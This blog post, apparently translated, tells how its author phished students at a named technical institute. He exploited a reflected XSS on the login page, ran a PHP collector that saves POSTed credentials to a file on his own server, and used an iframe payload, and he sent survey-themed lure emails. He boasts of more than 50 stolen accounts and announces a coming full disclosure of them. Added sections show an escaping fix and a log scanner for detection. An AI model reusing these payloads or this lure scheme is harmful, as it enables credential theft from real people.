Thursday, April 7, 2011

Phishing ITM

Explanation
Since the research was a success, I will explain how the procedure was carried out to obtain the user accounts of students of the Metropolitan Institute of Technology (ITM). Mainly, I knew that the browser was vulnerable to XSS (I remember a presentation on the subject last fall, in the mother tongue course, which talked about the main mistakes programmers make). At first I had some questions that my friends helped me resolve; one of them was how to hide the original content of the page in order to put my malicious code there. I knew it was done with JavaScript, but did not know how. My friend Yoyahack helped me, saying it was as follows.
 # 
document.body.innerHTML = 'Hello World';
#

Now that I had that, I went straight to the XSS and performed the following Proof of Concept (PoC). It gave me some errors because of the double quotes, single quotes and special characters, and I got a bit stuck looking at how I could fix it. After a while, with some modifications I made, the errors disappeared and the phishing page was complete. Now all that remained was to create the page where the captured data would be sent.
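The whole scheme rests on a reflected XSS: a query-string parameter that the login page echoes into its HTML without encoding it. As an added illustration (not code from the original post or from the institution's site), the Python below simulates that reflection next to the corrected version, using `html.escape` to entity-encode the reflected value. The constructed input is the URL-encoded form of the post's own "Hello World" snippet; the page template is a stand-in, not the real ASP page.

```python
import html
from urllib.parse import unquote

# Constructed input: the URL-encoded form of the snippet shown in this post
# (<script>document.body.innerHTML = "Hello World"</script>), as it would arrive
# in a query-string parameter that the login page reflects.
ENCODED_PAYLOAD = (
    "%3Cscript%3Edocument.body.innerHTML%20%3D%20%22Hello%20World%22%3C%2Fscript%3E"
)

# Stand-in for the page template; the real ASP page is not reproduced here.
TEMPLATE = "<html><body><p>{value}</p></body></html>"


def render_vulnerable(raw_param: str) -> str:
    """Decodes the parameter and reflects it straight into the HTML.
    This is the defect class the post relies on: the browser parses the
    injected <script> as part of the page."""
    return TEMPLATE.format(value=unquote(raw_param))


def render_hardened(raw_param: str) -> str:
    """Same page, but the reflected value is entity-encoded first, so
    <, >, &, ' and " are rendered as text rather than as markup."""
    return TEMPLATE.format(value=html.escape(unquote(raw_param), quote=True))


def has_active_markup(rendered: str) -> bool:
    """Crude check on the rendered output: is there a <script> or <iframe>
    element a browser would execute or load?"""
    lowered = rendered.lower()
    return "<script" in lowered or "<iframe" in lowered


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(ENCODED_PAYLOAD))
    print("hardened:  ", render_hardened(ENCODED_PAYLOAD))
```

Entity encoding is the fix for a value reflected into the HTML body, which is the context here; a value placed inside an attribute or inside a script block needs the encoding for that context instead. A Content-Security-Policy that disallows inline script is an independent second layer that would also have stopped both payloads described in this post.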

On my server I created a file called xss.php with the following code:
#
<?php
// Concatenate every POST field, separated by "-", into one line
$sContenido = "";

foreach ($_POST as $svar => $sval) {
    $sContenido .= $sval . "-";
}
$sContenido .= "\n";

// Append the line to XSS.txt
$sPathFile = "XSS.txt";
$sFileOpen = fopen($sPathFile, "a");
fwrite($sFileOpen, $sContenido);
fclose($sFileOpen);

// Redirect to the original validation page
header("Location: http://www.itm.edu.co/Decanaturas/ValidaClaveAlumnos.asp?");
?>
#

The above code captures all the variables sent by the POST method and stores them in a text file called XSS.txt. After saving the data it redirects to the original page that validates the login data; since we do not send the data directly to that page, it throws an error (Figure 1), which in turn redirects to the original login.
Figure 1: error message.

I already had everything complete; it was time to do local tests to see if it worked or had other errors. I entered my malicious STRING. It was many, too many characters, and so far there had been no problem. I extracted some of the code to display it.
 
# "% 3Cscript% 3Edocument.body.innerHTML% 20 =% 22% 3Chtml% 20xmlns = 'http://www.w3.org/1999
/ xhtml'% 3E% 3E% 3Chead% 3Cstyle% 20type = 'text / css'% 3E% 3E% 3C/style% 3Cmeta%
20http-equiv = "Content-Type'% 20content = 'text / html;% 20charset = iso-8859-1'% 3E% 3Ctitle% 3EITM% 20 -% 20%
Institute 20Tecnol% C3% B3gico% 20Metropolitano% 3C/title% 3E% 3Clink% 20rel = 'stylesheet'
% 20type = 'text / css'% 20href = 'index.css'% 3E% 3C / head% 3E% 3Cbody% 3E% 3Cdiv% 20id = 'wrapper'
% 3E% 3Cdiv% 20id = 'header'% 3E% 3Cdiv% 20id = 'header-left'% 3E% 3CA% 20href = 'http:// www.itm.
edu.co '% 3E% 3Cimg% 20src =' images / logoITM.png "% 20alt = 'portal%' 20title% = '20ITM portal
0ITM% 2'% 3E% 3C / a% 3E% 3C/div% 3E% 3Cdiv% 20ID = 'header-right'% 3E% 3Cdiv% 20ID = 'topmenu'% 3E% 3C% 3E% 3Cspan
p% 20style = 'color:% 20rgb (11, 20 141%,% 20178);% 20 '%% 3EEnglish 20version 3C/sp
% to% 3E% 20
estiondelaCalidad.aspx '"#



But when sending the POST request to the file on my server, I got an error (Figure 2), so I got to thinking about how I could solve the problem; I guess the error was due to the amount of characters used.
Figure 2: Error.
So, as an easy way to receive the data on my server, I used an iframe, and the code I wrote was put directly in a page on my server. Now I changed the malicious code:
# % 3Cscript% 3E
document.body.innerHTML% 20 =% 22% 3Ciframe
 
% 20src = 'http:// [MI-SERVER] / xss / index.php % 20width = '100% '% 20height = '100%'% 3E% 3C/iframe

% 22% 3E% 3C/script% 3E

#


It is not the best option because you can see the scrollbar, pfff, but I wanted to do it quickly and this was the only solution I found.
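Both payloads above reach the server as a URL-encoded query string, so the same request ends up in the web server's access log, where a defender can find it after the fact. The following is an added example, not from the original post: a small Python scanner over constructed log lines (combined log format) that percent-decodes each query string, repeating the decode to catch double encoding, and flags the markup indicators these payloads carry (`<script`, `<iframe`, `.innerHTML`). The request path is the one named in the post; the parameter name `msg`, the client addresses, the timestamps and the `example.invalid` host standing in for [MI-SERVER] are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format). The request path is the
# one named in the post; the parameter name "msg", the client addresses, the timestamps
# and the example.invalid host (standing in for [MI-SERVER]) are assumptions.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Apr/2011:10:01:02 -0500] "GET /Decanaturas/ValidaClaveAlumnos.asp?msg=Clave%20incorrecta HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
10.0.0.9 - - [07/Apr/2011:10:03:44 -0500] "GET /Decanaturas/ValidaClaveAlumnos.asp?msg=%3Cscript%3Edocument.body.innerHTML%20=%22%3Ciframe%20src='http://example.invalid/xss/index.php'%20width='100%25'%20height='100%25'%3E%3C/iframe%3E%22%3C/script%3E HTTP/1.1" 200 2410 "-" "Mozilla/5.0"
10.0.0.12 - - [07/Apr/2011:10:05:10 -0500] "GET /Decanaturas/ValidaClaveAlumnos.asp?msg=%253Cscript%253Edocument.body.innerHTML%2520%253D%2520%2522Hello%2522%253C%252Fscript%253E HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
10.0.0.7 - - [07/Apr/2011:10:06:30 -0500] "POST /Decanaturas/ValidaClaveAlumnos.asp HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Markup that has no business in a login page's query string.
INDICATORS = re.compile(r"<script|<iframe|\.innerhtml", re.IGNORECASE)

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so a double-encoded
    payload (%253C -> %3C -> <) is seen in its final form."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def query_of(target: str) -> str:
    """Return the query-string part of a request target ('' if none)."""
    return target.partition("?")[2]


def scan_log(text: str) -> list:
    """Return (ip, timestamp, sorted indicators) for every request whose decoded
    query string carries one of the XSS markup indicators."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        decoded = decode_fully(query_of(m["target"]))
        found = sorted({x.lower() for x in INDICATORS.findall(decoded)})
        if found:
            hits.append((m["ip"], m["ts"], found))
    return hits


if __name__ == "__main__":
    for ip, ts, found in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} reflected-XSS indicators: {', '.join(found)}")
```

Only the two GET requests carrying encoded markup are reported; the ordinary error-message value and the POST login attempt are not. Decoding to a fixed point matters because a single `unquote` pass leaves the double-encoded line looking harmless.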

I had already created the social-engineering emails to get students to go to my phishing page and type in their data. I went into my personal mail at the institution and looked for the topic that stood out and repeated the most, and that topic was mailings about surveys at the institution, so that was the subject.
I also had the problem that the mail account I had created was on Hotmail, so when I sent an e-mail to other students it arrived in their SPAM folder; some would get it and some would not. I could have gotten an account from the institution itself, but that would have taken me more time.
As I said before, the subject I would use to deceive the students was surveys, so I sent a general email with the following information (Figure 3).
Figure 3: Mail sent with the malicious link.
Now that everything was ready and the mail sent, I waited about 5 hours, and the result was very satisfactory, since in that time I had obtained more than 50 user accounts.
If I had gotten an original account from the institution, we would be talking about the mail arriving directly in their inbox.
That is all for now; wait and see what more results I get.

NOTE:
In 5 days I will write a post with the full disclosure of the information collected.
